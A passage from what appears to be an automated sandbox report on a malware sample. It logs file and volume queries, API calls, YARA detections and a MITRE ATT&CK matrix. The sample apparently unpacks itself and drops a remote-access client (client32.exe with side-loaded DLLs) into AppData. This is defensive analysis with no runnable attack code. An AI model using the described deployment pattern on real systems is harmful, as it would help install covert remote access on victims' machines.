                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\psutil VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\psutil VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\psutil VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\psutil\_psutil_windows.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\PIL VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\PIL VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\PIL VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\PIL VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\build.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\build.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\build.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted\client32.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted\client32.ini VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted\HTCTL32.DLL VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted\msvcr100.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted\nskbfltr.inf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted\NSM.LIC VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted\pcicapi.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted\PCICHEK.DLL VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted\PCICL32.DLL VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted\TCCTL32.DLL VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted\AudioCapture.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted\client32.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\PIL VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\screenshot.png VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\certifi\cacert.pem VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\certifi\cacert.pem VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\certifi\cacert.pem VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\certifi\cacert.pem VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74282\certifi\cacert.pem VolumeInformationJump to behavior
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748AFD080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF748AFD080
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C3379B0 GetVersionExA,GetUserNameA,6_2_6C3379B0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748B15C70 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF748B15C70
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE103018C0 PyModule_Create2,getenv,RtlGetVersion,GetSystemInfo,InitializeCriticalSection,PyModule_GetState,PyErr_NewException,_Py_Dealloc,PyErr_NewException,PyModule_AddObject,PyErr_NewException,PyModule_AddObject,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,1_2_00007FFE103018C0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE11ED45C4 PySys_Audit,PyEval_SaveThread,bind,PyEval_RestoreThread,_Py_NoneStruct,1_2_00007FFE11ED45C4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE11ED55D8 _PyArg_ParseTuple_SizeT,PyEval_SaveThread,listen,PyEval_RestoreThread,_Py_NoneStruct,1_2_00007FFE11ED55D8
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_10703240 CapiListen,6_2_10703240
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C338F80 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,LeaveCriticalSection,GetTickCount,InterlockedExchange,6_2_6C338F80
                                Source: Yara matchFile source: 15.2.client32.exe.cf0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.BUenB12U2a.exe.2101113a770.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.2.client32.exe.6c610000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.2.client32.exe.6c7c0658.5.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.BUenB12U2a.exe.21012184cb8.13.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 16.0.client32.exe.cf0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 16.2.client32.exe.6c610000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.0.client32.exe.cf0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.cf0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.6c7c0658.6.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.6c610000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 16.2.client32.exe.cf0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.BUenB12U2a.exe.210111db420.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.2.client32.exe.10700000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.BUenB12U2a.exe.210111c77d0.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 16.2.client32.exe.6c7c0658.5.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 16.2.client32.exe.10700000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.0.client32.exe.cf0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.BUenB12U2a.exe.210111db420.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.6c330000.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.10700000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.BUenB12U2a.exe.210111db420.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.BUenB12U2a.exe.210111cb3e0.3.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.BUenB12U2a.exe.210111db420.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.BUenB12U2a.exe.21011194ec0.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.BUenB12U2a.exe.21011926cf8.12.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.2.client32.exe.6c620000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.6c620000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 16.2.client32.exe.6c620000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000006.00000002.4178949797.000000006C36D000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000F.00000002.1935755289.0000000000CF2000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2017197752.000000006C7E9000.00000004.00000001.01000000.00000017.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1798201497.00000210111CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1797337365.00000210111CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1797646830.00000210111CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1796297980.0000021011134000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1800970683.00000210111C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1796297980.00000210111C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1799328127.00000210111F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2015358082.0000000000CF2000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.4179494402.000000006C7E9000.00000004.00000001.01000000.00000017.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.4179457896.000000006C79E000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1799328127.00000210111E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1797337365.0000021011130000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1798361127.00000210111CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000F.00000002.1937304626.000000006C79E000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1803194949.00000210118E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1800179941.00000210111C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000000.2014443463.0000000000CF2000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2017121841.000000006C79E000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1799122999.00000210111F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1800730653.00000210111C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1801257189.00000210120E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1801612970.00000210111C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.4176999373.0000000000CF2000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1799122999.00000210111E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000F.00000002.1937393057.000000006C7E9000.00000004.00000001.01000000.00000017.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1799989658.00000210118E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1796447903.00000210111C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000000.1805249971.0000000000CF2000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000F.00000000.1933516964.0000000000CF2000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1802845516.00000210111C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: BUenB12U2a.exe PID: 7484, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\extracted\PCICHEK.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\extracted\AudioCapture.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\extracted\TCCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\extracted\pcicapi.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\extracted\HTCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\extracted\client32.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\extracted\PCICL32.DLL, type: DROPPED

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity InformationAcquire Infrastructure1
                                Valid Accounts                                		2
                                Native API                                		1
                                DLL Side-Loading                                		1
                                DLL Side-Loading                                		11
                                Disable or Modify Tools                                		OS Credential Dumping12
                                System Time Discovery                                		Remote Services1
                                Archive Collected Data                                		1
                                Web Service                                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                CredentialsDomainsDefault Accounts2
                                Service Execution                                		1
                                Valid Accounts                                		1
                                Valid Accounts                                		1
                                Deobfuscate/Decode Files or Information                                		LSASS Memory1
                                Account Discovery                                		Remote Desktop ProtocolData from Removable Media5
                                Ingress Tool Transfer                                		Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain AccountsAt1
                                Windows Service                                		11
                                Access Token Manipulation                                		4
                                Obfuscated Files or Information                                		Security Account Manager1
